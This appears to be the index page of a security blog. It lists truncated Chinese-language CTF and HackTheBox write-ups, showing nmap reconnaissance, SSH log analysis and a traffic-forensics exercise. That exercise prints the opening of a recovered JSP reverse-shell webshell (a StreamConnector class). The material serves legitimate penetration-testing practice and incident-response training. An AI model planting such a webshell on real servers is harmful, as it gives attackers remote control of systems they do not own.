Hi, I'm GAiLO
Security Researcher & Developer — Looking for light.
-
春秋云镜——Flarum
0x01 信息收集 ┌──────────────────────────────────────────────┐ │ ___ _ │ │ / _ \ ___ ___ _ __ __ _ ___| | __ │ │ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │ │ / /_\\_____\__ \ (__| | |...
-
HTB——Intelligence
0x01 信息收集 ┌──(root㉿kali)-[/home/kali/HTB/Intelligence] └─# nmap -A 10.129.224.3 Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-29 03:08 EDT Nmap scan report for 10.129.224.3 Host is up (0.12s latency). Not shown: 988 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 53/tcp open...
-
HTB——Authority
0x01 信息收集 _____ ___ _ /__ \ ___ ___ __ _ _ __ / _ \| | _ _ ___ / /\// __| / __| / _' || '_ \ / /_)/| || | | |/ __| / / \__...
-
0x01 信息收集 ┌──────────────────────────────────────────────┐ │ ___ _ │ │ / _ \ ___ ___ _ __ __ _ ___| | __ │ │ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │ │ / /_\\_____\__ \ (__| | |...
-
HTB——Driver
0x01 信息收集 ┌──────────────────────────────────────────────┐ │ ___ _ │ │ / _ \ ___ ___ _ __ __ _ ___| | __ │ │ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │ │ / /_\\_____\__ \ (__| | |...
-
HTB——Buff
0x01 信息收集 ┌──────────────────────────────────────────────┐ │ ___ _ │ │ / _ \ ___ ___ _ __ __ _ ___| | __ │ │ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │ │ / /_\\_____\__ \ (__| | |...
-
HTB——Outdated
0x01 信息收集 _____ ___ _ /__ \ ___ ___ __ _ _ __ / _ \| | _ _ ___ / /\// __| / __| / _' || '_ \ / /_)/| || | | |/ __| / / \__...
-
HTB——Compiled
0x01 信息收集 ┌──────────────────────────────────────────────┐ │ ___ _ │ │ / _ \ ___ ___ _ __ __ _ ___| | __ │ │ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │ │ / /_\\_____\__ \ (__| | |...
-
HTB——Bastion
0x01 信息收集 ┌──────────────────────────────────────────────┐ │ ___ _ │ │ / _ \ ___ ___ _ __ __ _ ___| | __ │ │ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │ │ / /_\\_____\__ \ (__| | |...
-
玄机——流量特征分析tomcat
下载附件,是一个pcap流量包。首先要我们分析扫描的IP,使用筛选GET请求数据包,可快速定位到恶意IP。在使用查询软件即可定位IP所在城市为广州。 筛选IP源为14.0.0.120的HTTP数据包,查看访问manager路由的数据包,在Destination字段可看到访问的目的端口为8080。故8080端口提供对服务器管理面板的访问 分析攻击者使用的攻击工具,我们就需要先定位攻击者的攻击流量。找到唯一一个POST包,将包保存下来后我们使用foremost提取出之中的压缩包,解压后我们找到一个rzpmxxmm.jsp <%@page import="java.lang.*"%> <%@page import="java.util.*"%> <%@page import="java.io.*"%> <%@page import="java.net.*"%> <% class StreamConnector extends Thread { InputStream ns; OutputStream vA; StreamConnector( InputStream ns, OutputStream vA ) { this.ns = ns; this.vA = vA; } public void run() { BufferedReader...
-
HTB——Rebound
0x01 信息收集 _____ ___ _ /__ \ ___ ___ __ _ _ __ / _ \| | _ _ ___ / /\// __| / __| / _' || '_ \ / /_)/| || | | |/ __| / / \__...
-
玄机——linux实战-CMS01
上线后我们首先查看SSH的日志。处于/var/log/secure内。分析日志我们发现可疑IP [root@ip-10-0-10-4 log]# cat secure Mar 20 10:30:24 web-server sshd[1054]: Received SIGHUP; restarting. Mar 20 10:30:24 web-server sshd[1054]: Server listening on 0.0.0.0 port 22. Mar 20 10:30:24 web-server sshd[1054]: Server listening on :: port 22. Mar 20 10:30:25 web-server sshd[4111]:...